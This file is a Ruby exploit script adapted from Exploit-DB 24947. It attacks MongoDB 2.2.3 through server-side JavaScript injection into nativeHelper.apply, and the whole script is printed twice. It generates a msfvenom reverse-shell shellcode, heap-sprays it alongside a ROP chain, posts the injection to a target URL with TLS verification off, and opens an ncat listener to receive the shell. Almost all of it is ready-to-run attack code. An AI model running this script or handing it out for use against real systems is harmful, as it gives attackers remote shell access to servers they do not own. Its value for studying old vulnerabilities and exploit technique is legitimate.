ugnius-s/24947.rb

## 24947.rb
# Title: MongoDB nativeHelper.apply Remote Code Execution
# Exploit Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
# Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
# MongoDB Version: 2.2.3
# Copied from https://www.exploit-db.com/exploits/24947
# Author: Ugnius Skučas

require 'http'

# MODIFY THESE
LHOST = '10.10.10.15'
LPORT = 443
PARAMETER = "CompanyName"

target_url = "https://10.10.10.10/cgi-bin/mongo/2.2.3/dbparse.py"

puts "[+] Selected target url: #{target_url}"
puts "[+] Building JavaScript linux/x86/shell_reverse_tcp"
shellcode = `msfvenom -p linux/x86/shell_reverse_tcp LHOST=#{LHOST} LPORT=#{LPORT} CMD=/bin/bash -f js_le -e generic/none 2>/dev/null}`

puts "[+] Building payload with the shellcode"
payload =  """shellcode=unescape('#{shellcode}');"""
payload += """sizechunk=0x1000; chunk='';"""
payload += """for(i=0;i<sizechunk;i++){ chunk+=unescape('%u9090%u9090'); }"""
payload += """chunk=chunk.substring(0,(sizechunk-shellcode.length));"""
payload += """testarray=new Array();"""
payload += """for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; }"""
payload += """ropchain=unescape('%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000');"""
payload += """sizechunk2=0x1000; chunk2='';"""
payload += """for(i=0;i<sizechunk2;i++){ chunk2+=unescape('%u5a70%u0805'); }"""
payload += """chunk2=chunk2.substring(0,(sizechunk2-ropchain.length));"""
payload += """testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; }"""
payload += """nativeHelper.apply({'x' : 0x836e204}, ['A'+'\x26\x18\x35\x08'+'MongoSploit!'+'\x58\x71\x45\x08'+'sthack is a nice place to be'+'\x6c\x5a\x05\x08'+'\x20\x20\x20\x20'+'\x58\x71\x45\x08']);"""
puts "[+] Payload: #{payload}"

Thread.start do
  puts "[+] Sending exploit via POST request"
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

  # {'$where': "this.CompanyName == 'INPUT'"}
  HTTP.post(target_url, ssl_context: ctx,
                 form: { "#{PARAMETER}": "';#{payload};var _='" })
end

puts "[+] Launching ncat listener on address #{LHOST} and port #{LPORT}"
system %Q{ncat -nvl #{LHOST} #{LPORT}}
	# Title: MongoDB nativeHelper.apply Remote Code Execution
	# Exploit Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
	# Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
	# MongoDB Version: 2.2.3
	# Copied from https://www.exploit-db.com/exploits/24947
	# Author: Ugnius Skučas

	require 'http'

	# MODIFY THESE
	LHOST = '10.10.10.15'
	LPORT = 443
	PARAMETER = "CompanyName"

	target_url = "https://10.10.10.10/cgi-bin/mongo/2.2.3/dbparse.py"

	puts "[+] Selected target url: #{target_url}"
	puts "[+] Building JavaScript linux/x86/shell_reverse_tcp"
	shellcode = `msfvenom -p linux/x86/shell_reverse_tcp LHOST=#{LHOST} LPORT=#{LPORT} CMD=/bin/bash -f js_le -e generic/none 2>/dev/null}`

	puts "[+] Building payload with the shellcode"
	payload = """shellcode=unescape('#{shellcode}');"""
	payload += """sizechunk=0x1000; chunk='';"""
	payload += """for(i=0;i<sizechunk;i++){ chunk+=unescape('%u9090%u9090'); }"""
	payload += """chunk=chunk.substring(0,(sizechunk-shellcode.length));"""
	payload += """testarray=new Array();"""
	payload += """for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; }"""
	payload += """ropchain=unescape('%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000');"""
	payload += """sizechunk2=0x1000; chunk2='';"""
	payload += """for(i=0;i<sizechunk2;i++){ chunk2+=unescape('%u5a70%u0805'); }"""
	payload += """chunk2=chunk2.substring(0,(sizechunk2-ropchain.length));"""
	payload += """testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; }"""
	payload += """nativeHelper.apply({'x' : 0x836e204}, ['A'+'\x26\x18\x35\x08'+'MongoSploit!'+'\x58\x71\x45\x08'+'sthack is a nice place to be'+'\x6c\x5a\x05\x08'+'\x20\x20\x20\x20'+'\x58\x71\x45\x08']);"""
	puts "[+] Payload: #{payload}"

	Thread.start do
	puts "[+] Sending exploit via POST request"
	ctx = OpenSSL::SSL::SSLContext.new
	ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

	# {'$where': "this.CompanyName == 'INPUT'"}
	HTTP.post(target_url, ssl_context: ctx,
	form: { "#{PARAMETER}": "';#{payload};var _='" })
	end

	puts "[+] Launching ncat listener on address #{LHOST} and port #{LPORT}"
	system %Q{ncat -nvl #{LHOST} #{LPORT}}
No results found